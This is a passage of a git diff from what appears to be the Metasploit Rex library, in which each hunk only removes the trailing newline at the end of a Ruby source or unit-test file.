b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb @@ -136,4 +136,4 @@ class Stdapi < Extension end end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb index 2ed968474f..cb3c68fcdf 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb @@ -60,4 +60,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb index 2e617b82b3..a05e969b1c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb @@ -181,4 +181,4 @@ class EventLog end end -end end end end end end +end end end end end end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb index 72432143fc..1b7c669980 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb @@ -38,4 +38,4 @@ class EventRecord end -end end end end end end end +end end end end end end end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb index 3850b3f840..e772c5defc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb @@ -58,4 +58,4 @@ class Power end -end end end end end end +end end end end end end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb index 9b2939a486..0bf2342d9c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb @@ -319,4 +319,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb index cd5b68b5da..e0023b735b 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb @@ -126,4 +126,4 @@ protected end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb index c4fc876250..aed9504577 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb @@ -52,4 +52,4 @@ protected end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb index 68e392415a..a38b4e7d51 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb @@ -333,5 +333,4 @@ protected attr_accessor :process # :nodoc: end -end; end; end; end; end; end; end - +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb index b00ebf3bc7..c0037df1f9 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb @@ -138,4 +138,4 @@ protected end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb index 69cd4ab70f..8713590ee9 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb @@ -260,4 +260,4 @@ class Registry end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb index 99932f7ff5..c08c6e9823 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb @@ -171,4 +171,4 @@ protected attr_writer :hkey, :root_key, :base_key, :perm # :nodoc: end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb index f5b90a96aa..a22bd0e1d4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb @@ -99,4 +99,4 @@ protected attr_writer :hkey, :name, :type, :data # :nodoc: end -end; end; end; end; end; end; end +end; end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb index f4e05b4b77..f1760e0944 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb @@ -171,4 +171,4 @@ protected end -end; end; end; end; end; end +end; end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index a798c0e833..c53d876f41 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -161,4 +161,4 @@ TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013 TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100 TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101 -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb index 03df12e876..ad5ad1117a 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb @@ -99,4 +99,4 @@ protected end -end; end; end; end; end +end; end; end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/inbound_packet_handler.rb b/lib/rex/post/meterpreter/inbound_packet_handler.rb index 2eb8faae21..66ad0ff1e9 100644 --- a/lib/rex/post/meterpreter/inbound_packet_handler.rb +++ b/lib/rex/post/meterpreter/inbound_packet_handler.rb @@ -27,4 +27,4 @@ module InboundPacketHandler end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/object_aliases.rb b/lib/rex/post/meterpreter/object_aliases.rb index 036b53fbb9..a535648c5e 100644 --- a/lib/rex/post/meterpreter/object_aliases.rb +++ b/lib/rex/post/meterpreter/object_aliases.rb @@ -80,4 +80,4 @@ class ObjectAliases end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 1441c9822f..58173c6e0d 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -552,4 +552,4 @@ class Packet < GroupTlv end end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index 68bca8715c..e3fcfc6b8c 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -265,4 +265,4 @@ protected attr_accessor :waiters # :nodoc: end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index d2b58d76fe..4f225937f9 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -90,4 +90,4 @@ protected end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/packet_response_waiter.rb b/lib/rex/post/meterpreter/packet_response_waiter.rb index 03a1c2ecad..66648a2d6c 100644 --- a/lib/rex/post/meterpreter/packet_response_waiter.rb +++ b/lib/rex/post/meterpreter/packet_response_waiter.rb @@ -76,4 +76,4 @@ class PacketResponseWaiter attr_accessor :completion_routine, :completion_param # :nodoc: end -end; end; end +end; end; end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb index 231d692b75..7d319d4adb 100644 --- a/lib/rex/post/meterpreter/ui/console.rb +++ b/lib/rex/post/meterpreter/ui/console.rb @@ -124,4 +124,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb index 374243cf22..a2f00b7cf8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb @@ -59,4 +59,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 7fba04bb2a..e41d763fcc 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -483,4 +483,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb index 56c0a7bba5..43c7bb1e12 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb @@ -238,4 +238,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb index 1c71ce59b6..5919f004f4 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb @@ -56,4 +56,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb index e8ec856d23..d1745736df 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb @@ -48,4 +48,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb index 5e5581648a..ec02389d41 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb @@ -129,4 +129,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb index 54bdd19294..40ccfd09fb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb @@ -60,4 +60,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb index 8902e19d31..f297f961fc 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb @@ -343,4 +343,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb index a29072e864..dcce53c9ec 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb @@ -262,4 +262,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index c0259e31df..d455c3c215 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -386,4 +386,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 0b4c62d24c..5473c4a9d3 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -90,4 +90,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb index 10e9be8932..c04e60ee42 100644 --- a/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +++ b/lib/rex/post/meterpreter/ui/console/interactive_channel.rb @@ -92,4 +92,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/post/permission.rb b/lib/rex/post/permission.rb index eb85c9596f..6621b6647c 100644 --- a/lib/rex/post/permission.rb +++ b/lib/rex/post/permission.rb @@ -23,4 +23,4 @@ PROCESS_ALL = 0xffffffff THREAD_READ = (1 << 0) THREAD_WRITE = (1 << 1) THREAD_EXECUTE = (1 << 2) -THREAD_ALL = 0xffffffff +THREAD_ALL = 0xffffffff \ No newline at end of file diff --git a/lib/rex/post/process.rb b/lib/rex/post/process.rb index 8b5a436c44..d84cad0980 100644 --- a/lib/rex/post/process.rb +++ b/lib/rex/post/process.rb @@ -54,4 +54,4 @@ class Process end -end; end # Post/Rex +end; end # Post/Rex \ No newline at end of file diff --git a/lib/rex/post/thread.rb b/lib/rex/post/thread.rb index f5ca219795..623866a0bd 100644 --- a/lib/rex/post/thread.rb +++ b/lib/rex/post/thread.rb @@ -54,4 +54,4 @@ class Thread end end -end; end +end; end \ No newline at end of file diff --git a/lib/rex/post/ui.rb b/lib/rex/post/ui.rb index b009078138..6323dc889c 100644 --- a/lib/rex/post/ui.rb +++ b/lib/rex/post/ui.rb @@ -49,4 +49,4 @@ class UI end -end; end +end; end \ No newline at end of file diff --git a/lib/rex/proto.rb b/lib/rex/proto.rb index 140eed6cf7..9ba4f1d9ce 100644 --- a/lib/rex/proto.rb +++ b/lib/rex/proto.rb @@ -8,4 +8,4 @@ module Proto attr_accessor :alias end -end +end \ No newline at end of file diff --git a/lib/rex/proto.rb.ts.rb b/lib/rex/proto.rb.ts.rb index 85d5c87b27..7fd2011f20 100644 --- a/lib/rex/proto.rb.ts.rb +++ b/lib/rex/proto.rb.ts.rb @@ -5,4 +5,4 @@ $:.unshift(File.join(File.dirname(__FILE__), '..')) require 'test/unit' require 'rex/proto/smb.rb.ts' require 'rex/proto/dcerpc.rb.ts' -require 'rex/proto/http.rb.ts' +require 'rex/proto/http.rb.ts' \ No newline at end of file diff --git a/lib/rex/proto/dcerpc.rb b/lib/rex/proto/dcerpc.rb index a62f4862b1..2c9f38759b 100644 --- a/lib/rex/proto/dcerpc.rb +++ b/lib/rex/proto/dcerpc.rb @@ -3,4 +3,4 @@ require 'rex/proto/dcerpc/response' require 'rex/proto/dcerpc/client' require 'rex/proto/dcerpc/packet' require 'rex/proto/dcerpc/handle' -require 'rex/proto/dcerpc/ndr' +require 'rex/proto/dcerpc/ndr' \ No newline at end of file diff --git a/lib/rex/proto/dcerpc.rb.ts.rb b/lib/rex/proto/dcerpc.rb.ts.rb index 4a908323cd..b4ed3ba645 100644 --- a/lib/rex/proto/dcerpc.rb.ts.rb +++ b/lib/rex/proto/dcerpc.rb.ts.rb @@ -6,4 +6,4 @@ require 'rex/proto/dcerpc/response.rb.ut' require 'rex/proto/dcerpc/packet.rb.ut' # require 'rex/proto/dcerpc/ndr.rb.ut' require 'rex/proto/dcerpc/handle.rb.ut' -require 'rex/proto/dcerpc/client.rb.ut' +require 'rex/proto/dcerpc/client.rb.ut' \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/client.rb b/lib/rex/proto/dcerpc/client.rb index a636a3f754..c1325f064d 100644 --- a/lib/rex/proto/dcerpc/client.rb +++ b/lib/rex/proto/dcerpc/client.rb @@ -354,4 +354,4 @@ require 'rex/proto/smb/exceptions' end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/client.rb.ut.rb b/lib/rex/proto/dcerpc/client.rb.ut.rb index 23e55601ec..b275fa4e8d 100755 --- a/lib/rex/proto/dcerpc/client.rb.ut.rb +++ b/lib/rex/proto/dcerpc/client.rb.ut.rb @@ -487,4 +487,4 @@ read = [ end rescue LoadError -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/exceptions.rb b/lib/rex/proto/dcerpc/exceptions.rb index 3d92c209d3..0b921ab679 100644 --- a/lib/rex/proto/dcerpc/exceptions.rb +++ b/lib/rex/proto/dcerpc/exceptions.rb @@ -147,4 +147,4 @@ end end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/handle.rb b/lib/rex/proto/dcerpc/handle.rb index d142faa2c0..df84ee29b1 100644 --- a/lib/rex/proto/dcerpc/handle.rb +++ b/lib/rex/proto/dcerpc/handle.rb @@ -44,4 +44,4 @@ class Handle end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/handle.rb.ut.rb b/lib/rex/proto/dcerpc/handle.rb.ut.rb index 720ee0252b..e912787ea7 100644 --- a/lib/rex/proto/dcerpc/handle.rb.ut.rb +++ b/lib/rex/proto/dcerpc/handle.rb.ut.rb @@ -82,4 +82,4 @@ class Rex::Proto::DCERPC::Handle::UnitTest < Test::Unit::TestCase handle = '6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_ip_tcp:10.4.10.10[80' assert_raise(Rex::ArgumentError, 'invalid handle (parser)') { Klass.parse(handle) } end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/ndr.rb b/lib/rex/proto/dcerpc/ndr.rb index 5f67746b8f..06b2484c95 100644 --- a/lib/rex/proto/dcerpc/ndr.rb +++ b/lib/rex/proto/dcerpc/ndr.rb @@ -69,4 +69,4 @@ class NDR end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/ndr.rb.ut.rb b/lib/rex/proto/dcerpc/ndr.rb.ut.rb index 07b30d4ed8..d38a612f55 100644 --- a/lib/rex/proto/dcerpc/ndr.rb.ut.rb +++ b/lib/rex/proto/dcerpc/ndr.rb.ut.rb @@ -38,4 +38,4 @@ class Rex::Proto::DCERPC::NDR::UnitTest < Test::Unit::TestCase assert_equal(16, Klass.UnicodeConformantVaryingStringPreBuilt('aa' + "\x00\x00").length, 'UniConformantVaryingStringPreBuilt length') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/packet.rb b/lib/rex/proto/dcerpc/packet.rb index 6359463d14..4d231ac648 100644 --- a/lib/rex/proto/dcerpc/packet.rb +++ b/lib/rex/proto/dcerpc/packet.rb @@ -250,4 +250,4 @@ require 'rex/text' end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/packet.rb.ut.rb b/lib/rex/proto/dcerpc/packet.rb.ut.rb index 80e5d506e2..606a9dcecd 100644 --- a/lib/rex/proto/dcerpc/packet.rb.ut.rb +++ b/lib/rex/proto/dcerpc/packet.rb.ut.rb @@ -53,4 +53,4 @@ class Rex::Proto::DCERPC::Packet::UnitTest < Test::Unit::TestCase expected = ["\005\000\000\x81\020\000\000\000\031\000\000\000\000\000\000\000\001\000\000\000\243\0349\005\201\273z6D\230\3615\2552\230\3608\000\020\003A", "\005\000\000\x80\020\000\000\000\031\000\000\000\000\000\000\000\001\000\000\000\243\0349\005\201\273z6D\230\3615\2552\230\3608\000\020\003B", "\005\000\000\x80\020\000\000\000\031\000\000\000\000\000\000\000\001\000\000\000\243\0349\005\201\273z6D\230\3615\2552\230\3608\000\020\003C", "\005\000\000\x82\020\000\000\000\031\000\000\000\000\000\000\000\001\000\000\000\243\0349\005\201\273z6D\230\3615\2552\230\3608\000\020\003D"] assert_equal(expected, actual, 'make_request with 4 frags') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/response.rb b/lib/rex/proto/dcerpc/response.rb index 7171702182..26c98caa24 100644 --- a/lib/rex/proto/dcerpc/response.rb +++ b/lib/rex/proto/dcerpc/response.rb @@ -178,4 +178,4 @@ protected end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/response.rb.ut.rb b/lib/rex/proto/dcerpc/response.rb.ut.rb index 8ca0aa911b..35f52892c9 100644 --- a/lib/rex/proto/dcerpc/response.rb.ut.rb +++ b/lib/rex/proto/dcerpc/response.rb.ut.rb @@ -12,4 +12,4 @@ class Rex::Proto::DCERPC::Response::UnitTest < Test::Unit::TestCase def test_parse end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/uuid.rb b/lib/rex/proto/dcerpc/uuid.rb index 49384ec659..3346331d2c 100644 --- a/lib/rex/proto/dcerpc/uuid.rb +++ b/lib/rex/proto/dcerpc/uuid.rb @@ -81,4 +81,4 @@ class UUID end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/dcerpc/uuid.rb.ut.rb b/lib/rex/proto/dcerpc/uuid.rb.ut.rb index c42e30aa30..4e639d39e4 100644 --- a/lib/rex/proto/dcerpc/uuid.rb.ut.rb +++ b/lib/rex/proto/dcerpc/uuid.rb.ut.rb @@ -43,4 +43,4 @@ class Rex::Proto::DCERPC::UUID::UnitTest < Test::Unit::TestCase assert_equal(Klass.vers_to_nums('2.0'), [2, 0], 'vers_to_nums') assert_equal(Klass.vers_to_nums('2'), [2, 0], 'vers_to_nums (short)') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb index a4e0e06071..470c4b176a 100644 --- a/lib/rex/proto/http.rb +++ b/lib/rex/proto/http.rb @@ -2,4 +2,4 @@ require 'rex/proto/http/packet' require 'rex/proto/http/request' require 'rex/proto/http/response' require 'rex/proto/http/client' -require 'rex/proto/http/server' +require 'rex/proto/http/server' \ No newline at end of file diff --git a/lib/rex/proto/http.rb.ts.rb b/lib/rex/proto/http.rb.ts.rb index 7697ea7d8d..da4479046b 100644 --- a/lib/rex/proto/http.rb.ts.rb +++ b/lib/rex/proto/http.rb.ts.rb @@ -9,4 +9,4 @@ require 'rex/proto/http/header.rb.ut' require 'rex/proto/http/request.rb.ut' require 'rex/proto/http/response.rb.ut' require 'rex/proto/http/handler/erb.rb.ut' -require 'rex/proto/http/handler/proc.rb.ut' +require 'rex/proto/http/handler/proc.rb.ut' \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index a143719d0c..32187636a8 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -782,4 +782,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb.ut.rb b/lib/rex/proto/http/client.rb.ut.rb index cc7431b212..3bd272ff41 100644 --- a/lib/rex/proto/http/client.rb.ut.rb +++ b/lib/rex/proto/http/client.rb.ut.rb @@ -88,4 +88,4 @@ class Rex::Proto::Http::Client::UnitTest < Test::Unit::TestCase c.close end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/handler.rb b/lib/rex/proto/http/handler.rb index ed35775874..7e61011400 100644 --- a/lib/rex/proto/http/handler.rb +++ b/lib/rex/proto/http/handler.rb @@ -43,4 +43,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/handler/erb.rb b/lib/rex/proto/http/handler/erb.rb index 22adec667e..e7478fc6f7 100644 --- a/lib/rex/proto/http/handler/erb.rb +++ b/lib/rex/proto/http/handler/erb.rb @@ -125,4 +125,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/handler/erb.rb.ut.rb b/lib/rex/proto/http/handler/erb.rb.ut.rb index 24b4584020..f26b541e27 100644 --- a/lib/rex/proto/http/handler/erb.rb.ut.rb +++ b/lib/rex/proto/http/handler/erb.rb.ut.rb @@ -18,4 +18,4 @@ class Rex::Proto::Http::Handler::Erb::UnitTest < Test::Unit::TestCase assert_equal("foo 4\n", r.body) end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/handler/proc.rb b/lib/rex/proto/http/handler/proc.rb index 32a49a03e6..9def92e92f 100644 --- a/lib/rex/proto/http/handler/proc.rb +++ b/lib/rex/proto/http/handler/proc.rb @@ -49,4 +49,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/handler/proc.rb.ut.rb b/lib/rex/proto/http/handler/proc.rb.ut.rb index bc572c2a16..2ca11ad729 100644 --- a/lib/rex/proto/http/handler/proc.rb.ut.rb +++ b/lib/rex/proto/http/handler/proc.rb.ut.rb @@ -21,4 +21,4 @@ class Rex::Proto::Http::Handler::Proc::UnitTest < Test::Unit::TestCase assert_equal(1, cool) end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/header.rb b/lib/rex/proto/http/header.rb index 6497d2d7b2..6921f93600 100644 --- a/lib/rex/proto/http/header.rb +++ b/lib/rex/proto/http/header.rb @@ -157,4 +157,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/header.rb.ut.rb b/lib/rex/proto/http/header.rb.ut.rb index 7096b6efd4..d979b6a100 100644 --- a/lib/rex/proto/http/header.rb.ut.rb +++ b/lib/rex/proto/http/header.rb.ut.rb @@ -43,4 +43,4 @@ class Rex::Proto::Http::Packet::Header::UnitTest < Test::Unit::TestCase h.from_s("POST /foo HTTP/1.0") assert_equal("POST /foo HTTP/1.0\r\n", h.cmd_string, 'just cmd_string') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/packet.rb b/lib/rex/proto/http/packet.rb index f064f839e8..26f9ff6f77 100644 --- a/lib/rex/proto/http/packet.rb +++ b/lib/rex/proto/http/packet.rb @@ -420,4 +420,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/packet.rb.ut.rb b/lib/rex/proto/http/packet.rb.ut.rb index 76cc1e56d1..cf31cc556d 100644 --- a/lib/rex/proto/http/packet.rb.ut.rb +++ b/lib/rex/proto/http/packet.rb.ut.rb @@ -162,4 +162,4 @@ class Rex::Proto::Http::Packet::UnitTest < Test::Unit::TestCase assert_equal("GET / HTTP/1.0\r\n", h.headers.cmd_string, 'cmd string') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb index 97d94af3ff..f9831590bb 100644 --- a/lib/rex/proto/http/request.rb +++ b/lib/rex/proto/http/request.rb @@ -353,4 +353,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/request.rb.ut.rb b/lib/rex/proto/http/request.rb.ut.rb index 9c23ee8b12..5858ee1e2b 100644 --- a/lib/rex/proto/http/request.rb.ut.rb +++ b/lib/rex/proto/http/request.rb.ut.rb @@ -211,4 +211,4 @@ class Rex::Proto::Http::Request::UnitTest < Test::Unit::TestCase h.uri = '/foo/..////./././asdf/././//../bar.html' assert_equal('/bar.html', h.uri, 'normalize on set') end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb index 3ef88b3962..3b8efc7998 100644 --- a/lib/rex/proto/http/response.rb +++ b/lib/rex/proto/http/response.rb @@ -82,4 +82,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/response.rb.ut.rb b/lib/rex/proto/http/response.rb.ut.rb index 4283a7f220..1db1b273a5 100644 --- a/lib/rex/proto/http/response.rb.ut.rb +++ b/lib/rex/proto/http/response.rb.ut.rb @@ -146,4 +146,4 @@ class Rex::Proto::Http::Response::UnitTest < Test::Unit::TestCase assert_equal('Babies', h['Eat']) end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/server.rb b/lib/rex/proto/http/server.rb index 641b057e62..ae7c1bbea5 100644 --- a/lib/rex/proto/http/server.rb +++ b/lib/rex/proto/http/server.rb @@ -347,4 +347,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/rex/proto/http/server.rb.ut.rb 